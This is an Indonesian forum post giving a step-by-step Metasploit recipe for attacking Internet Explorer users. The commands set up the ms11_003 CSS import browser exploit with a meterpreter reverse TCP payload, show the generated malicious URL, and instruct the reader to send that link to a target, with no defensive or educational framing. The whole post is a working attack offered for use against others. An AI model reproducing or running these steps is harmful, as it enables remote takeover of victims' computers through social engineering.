[SHARE] Memanfaatkan Browser IE
#1
Oke saya langsung saja.

1. Buka msfconsole
2. use exploit/windows/browser/ms11_003_ie_css_import
3. set PAYLOAD windows/meterpreter/reverse_tcp
4. set LHOST 192.168.1.3 (IP kalian)
5. set SRVHOST 192.168.1.3 (IP kalian)
6. set URIPATH /
7. Exploit
[*] Using URL: http://192.168.1.3:8080/X30k1kyxQ
[*] Server started.

8. Kirimkan http://192.168.1.3:8080/X30k1kyxQ ke target

Selesai deh :p

Maaf sebelum nya kalau seumpama udah ada yang post tentang ini hehehe


Messages In This Thread
[SHARE] Memanfaatkan Browser IE - by Arief.Kresna - 09-21-2013, 06:35 PM
RE: [SHARE] Memanfaatkan Browser IE - by rootart - 09-21-2013, 09:07 PM
RE: [SHARE] Memanfaatkan Browser IE - by D-Byte - 09-22-2013, 11:59 AM
RE: [SHARE] Memanfaatkan Browser IE - by Kresna - 10-19-2013, 07:59 PM




Users browsing this thread: 1 Guest(s)